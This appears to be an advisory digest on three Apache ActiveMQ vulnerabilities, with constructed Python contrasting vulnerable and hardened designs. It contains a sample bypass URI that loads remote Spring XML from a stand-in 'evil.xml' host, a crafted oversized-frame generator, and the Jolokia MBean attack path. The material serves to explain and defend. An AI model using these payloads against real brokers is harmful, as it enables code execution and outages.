Activemq Broker
Monthly
Unauthorized message consumption in Apache ActiveMQ Classic lets a connected client read from temporary destinations belonging to a different connection, breaking the per-connection isolation that applications rely on. The root cause is that the isolation check is enforced only client-side, so a malicious or rogue client can subscribe to and drain another connection's temporary queue/topic. It affects ActiveMQ (Broker/All/Classic) before 5.19.8 and 6.0.0 before 6.2.7; there is no public exploit identified at time of analysis, and it is not in CISA KEV.
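The design point above (an isolation check that exists only in the client) is easiest to see with both sides side by side. The following is an added illustration, not ActiveMQ code: a toy broker whose ownership check can be switched on or off, a well-behaved client that checks destination ownership itself, and a rogue client that speaks the same protocol but skips that check. Connection ids, destination names, messages and all class and function names are constructed for the example.

```python
"""Broker-side vs client-side enforcement of temporary-destination isolation.

Added illustration, not ActiveMQ code. Connection ids, destination names,
messages and all class/function names are constructed for the example.
"""
from dataclasses import dataclass, field


@dataclass
class TempDestination:
    name: str                    # constructed as "<owner connection id>:<sequence>"
    owner_conn_id: str
    messages: list = field(default_factory=list)


@dataclass
class Broker:
    enforce_ownership: bool      # True: broker checks; False: broker trusts the client
    temps: dict = field(default_factory=dict)

    def create_temp(self, conn_id: str, seq: int) -> str:
        dest = TempDestination(name=f"{conn_id}:{seq}", owner_conn_id=conn_id)
        self.temps[dest.name] = dest
        return dest.name

    def send(self, dest_name: str, body: str) -> None:
        self.temps[dest_name].messages.append(body)

    def consume(self, conn_id: str, dest_name: str) -> list:
        """Drain dest_name for conn_id; the only place a broker-side check can live."""
        dest = self.temps[dest_name]
        if self.enforce_ownership and dest.owner_conn_id != conn_id:
            raise PermissionError(f"{conn_id} is not the owner of {dest_name}")
        drained, dest.messages = list(dest.messages), []
        return drained


def well_behaved_consume(broker: Broker, conn_id: str, dest_name: str) -> list:
    """Client-side check: refuses foreign temp destinations before asking the broker."""
    if not dest_name.startswith(conn_id + ":"):
        raise PermissionError("client refuses to read a foreign temporary destination")
    return broker.consume(conn_id, dest_name)


def rogue_consume(broker: Broker, conn_id: str, dest_name: str) -> list:
    """Rogue client: speaks the same protocol, just omits the client-side check."""
    return broker.consume(conn_id, dest_name)


def scenario(enforce_ownership: bool) -> dict:
    """Victim creates a temp reply queue; a rogue connection tries to drain it first."""
    broker = Broker(enforce_ownership=enforce_ownership)
    victim, rogue = "ID:app-host-61616-1-1", "ID:evil-host-61616-2-1"  # constructed ids
    reply_q = broker.create_temp(victim, 1)
    broker.send(reply_q, "order-4711 approved")  # constructed reply payload
    try:
        stolen = rogue_consume(broker, rogue, reply_q)
    except PermissionError:
        stolen = []
    victim_sees = well_behaved_consume(broker, victim, reply_q)
    return {"stolen": stolen, "victim_sees": victim_sees}


if __name__ == "__main__":
    print("client-side check only:", scenario(enforce_ownership=False))
    print("broker-side check     :", scenario(enforce_ownership=True))
```

With `enforce_ownership=False` the rogue connection drains the victim's reply queue and the victim receives nothing; with the check moved into `Broker.consume` the rogue request is refused and the owner still gets its message. The client-side check in `well_behaved_consume` protects only clients that choose to run it.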
Denial of service in Apache ActiveMQ (versions before 5.19.8, and 6.0.0 before 6.2.7) lets an authenticated user crash the broker by sending a crafted OpenWire message whose property map declares an excessively large encoded size. The map is unmarshaled without checking the declared size against the bounds of the payload actually received, so the broker pre-allocates a buffer sized by the attacker-controlled value and hits an OutOfMemory condition. No public exploit was identified at the time of analysis and the issue is not in CISA KEV, but the low attack complexity and the availability of a vendor patch make it a practical operational concern for exposed brokers.
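The decoding mistake described above is generic to any length-prefixed format. The following added example (not ActiveMQ or OpenWire code) uses a constructed, simplified stand-in for a property map: an int32 declared map length, an int32 entry count, then uint16-prefixed key/value strings. `unmarshal_unbounded` sizes its buffer from the untrusted header, `unmarshal_bounded` refuses a header that disagrees with the bytes on the wire or exceeds a cap; `MAX_MAP_BYTES` is an assumed limit, not an ActiveMQ setting. The allocator is injectable so the vulnerable path can be observed without actually requesting 2 GiB from the heap.

```python
"""Bounded vs unbounded unmarshaling of a length-prefixed property map.

Added example, not ActiveMQ or OpenWire code; the wire format and the
MAX_MAP_BYTES cap are constructed for the illustration.
"""
import struct

MAX_MAP_BYTES = 64 * 1024  # assumed upper bound for a property map


def encode_map(props: dict) -> bytes:
    """Encode a str->str map in the constructed format, with a truthful header."""
    body = struct.pack(">i", len(props))
    for key, value in props.items():
        kb, vb = key.encode("utf-8"), value.encode("utf-8")
        body += struct.pack(">H", len(kb)) + kb + struct.pack(">H", len(vb)) + vb
    return struct.pack(">i", len(body)) + body


def craft_oversized_frame(props: dict, declared: int = 0x7FFFFFFF) -> bytes:
    """Same payload as encode_map, but the header lies about the map length."""
    return struct.pack(">i", declared) + encode_map(props)[4:]


def _decode_entries(body: bytes) -> dict:
    (count,) = struct.unpack_from(">i", body, 0)
    off, out = 4, {}
    for _ in range(count):
        (klen,) = struct.unpack_from(">H", body, off); off += 2
        key = body[off:off + klen].decode("utf-8"); off += klen
        (vlen,) = struct.unpack_from(">H", body, off); off += 2
        out[key] = body[off:off + vlen].decode("utf-8"); off += vlen
    return out


def unmarshal_unbounded(frame: bytes, allocate=bytearray) -> dict:
    """Vulnerable pattern: reserve a buffer of the declared size before reading."""
    (declared,) = struct.unpack_from(">i", frame, 0)
    scratch = allocate(declared)          # size comes straight from the attacker
    n = min(declared, len(frame) - 4)
    scratch[:n] = frame[4:4 + n]
    return _decode_entries(bytes(scratch[:n]))


def unmarshal_bounded(frame: bytes) -> dict:
    """Hardened pattern: validate the declared length before any allocation."""
    if len(frame) < 4:
        raise ValueError("frame too short for a map header")
    (declared,) = struct.unpack_from(">i", frame, 0)
    if declared < 4 or declared > MAX_MAP_BYTES:
        raise ValueError(f"declared map size {declared} outside [4, {MAX_MAP_BYTES}]")
    if declared != len(frame) - 4:
        raise ValueError(f"declared map size {declared} != payload {len(frame) - 4}")
    return _decode_entries(frame[4:])


def requested_allocation(frame: bytes) -> int:
    """Run the vulnerable decoder with a recording allocator; return the size it asked for."""
    asked = []

    def recording_allocate(n: int) -> bytearray:
        asked.append(n)
        return bytearray()        # stand-in for the real (possibly fatal) allocation

    unmarshal_unbounded(frame, allocate=recording_allocate)
    return asked[0]


if __name__ == "__main__":
    props = {"JMSXGroupID": "g1", "tenant": "blue"}  # constructed properties
    evil = craft_oversized_frame(props)
    print("vulnerable decoder asks for", requested_allocation(evil), "bytes")
    try:
        unmarshal_bounded(evil)
    except ValueError as exc:
        print("hardened decoder rejects:", exc)
```

Note that the crafted frame is only a few dozen bytes; the vulnerable decoder still asks for roughly 2 GiB because it trusts the header, while the bounded decoder fails closed on the same input before touching the heap.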
Remote code execution in Apache ActiveMQ Broker, ActiveMQ All, and ActiveMQ (versions before 5.19.7 and 6.0.0 before 6.2.6) allows authenticated attackers to bypass the CVE-2026-34197 fix. Non-parenthesized discovery wrappers such as `masterslave:vm://...` and `static:vm://...` incorrectly pass the validation that fix introduced; the wrapped VM transport then honours its brokerConfig parameter and loads a remote Spring XML application context. The attack path is the Jolokia JMX-HTTP bridge at /api/jolokia/, used to invoke the BrokerService.addNetworkConnector and addConnector MBean operations with such a URI, resulting in arbitrary code execution in the broker JVM. EPSS is low at 0.06% (19th percentile) and no public exploit was identified at the time of analysis, but the patch-bypass nature of the flaw and prior in-the-wild interest in ActiveMQ RCE chains warrant urgent patching.
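The bypass pattern described above (a check that understands `static:(vm://...)` but treats `static:vm://...` as an opaque endpoint) is worth seeing as code. The following is an added example and is not ActiveMQ's validation logic: `validate_naive` is a hypothetical validator with exactly that gap, and `validate_hardened` peels every wrapper layer whether or not it uses parentheses, then allows only an assumed set of leaf transports and refuses any `brokerConfig` parameter. The allowlist, regexes and sample URIs (including the 203.0.113.5 documentation address) are constructed.

```python
"""Transport-URI validation: first-scheme blocklist vs recursive unwrap.

Added example, not ActiveMQ code. The allowlist, regexes and sample URIs
are constructed for the illustration.
"""
import re

SCHEME_RE = re.compile(r"^([A-Za-z][A-Za-z0-9+.\-]*):(.*)$", re.S)
BLOCKED_FIRST_SCHEMES = {"vm"}                 # what the naive check looks for
ALLOWED_LEAF_SCHEMES = {"tcp", "ssl", "nio"}   # assumed allowlist for the hardened check
BROKER_CONFIG_PARAM = re.compile(r"[?&]brokerConfig=", re.I)


def _split_composite(inner: str) -> list:
    """Split 'a,b(c,d),e' on commas that are not inside parentheses."""
    parts, depth, cur = [], 0, []
    for ch in inner:
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
        if ch == "," and depth == 0:
            parts.append("".join(cur))
            cur = []
        else:
            cur.append(ch)
    parts.append("".join(cur))
    return [p for p in parts if p]


def validate_naive(uri: str) -> bool:
    """Rejects vm at the top level and inside (...) groups; anything else passes."""
    m = SCHEME_RE.match(uri)
    if not m:
        return False
    scheme, rest = m.group(1).lower(), m.group(2)
    if scheme in BLOCKED_FIRST_SCHEMES:
        return False
    if rest.startswith("("):
        inner = rest[1:rest.rfind(")")]
        return all(validate_naive(p) for p in _split_composite(inner))
    return True   # 'static:vm://...' lands here: rest is treated as an opaque endpoint


def leaf_transports(uri: str) -> list:
    """Peel wrappers (parenthesized or not) and return the concrete endpoint URIs."""
    m = SCHEME_RE.match(uri)
    if not m:
        raise ValueError(f"no scheme in {uri!r}")
    rest = m.group(2)
    if rest.startswith("("):
        depth = 0
        for i, ch in enumerate(rest):
            depth += (ch == "(") - (ch == ")")
            if depth == 0:
                break
        else:
            raise ValueError(f"unbalanced parentheses in {uri!r}")
        leaves = []
        for part in _split_composite(rest[1:i]):
            leaves.extend(leaf_transports(part))
        return leaves
    if rest.startswith("//"):
        return [uri]                      # a concrete endpoint such as tcp://host:61616
    return leaf_transports(rest)          # non-parenthesized wrapper: descend into it


def validate_hardened(uri: str) -> bool:
    """Allow only known leaf transports and never a brokerConfig parameter."""
    if BROKER_CONFIG_PARAM.search(uri):
        return False
    try:
        leaves = leaf_transports(uri)
    except ValueError:
        return False
    return bool(leaves) and all(
        SCHEME_RE.match(leaf).group(1).lower() in ALLOWED_LEAF_SCHEMES for leaf in leaves
    )


if __name__ == "__main__":
    for candidate in (
        "static:(tcp://10.0.0.5:61616,tcp://10.0.0.6:61616)",
        "static:(vm://localhost)",
        "static:vm://localhost",
        "masterslave:vm://localhost?brokerConfig=xbean:http://203.0.113.5/evil.xml",
    ):
        print(f"{candidate:<78} naive={validate_naive(candidate)} hardened={validate_hardened(candidate)}")
```

Two design choices matter here beyond the parenthesis handling: the hardened check decides on the leaf transports after unwrapping every layer, so a chain such as `static:failover:vm://...` is also caught, and it uses an allowlist of transports rather than a blocklist of one scheme, so an unexpected wrapper or transport fails closed.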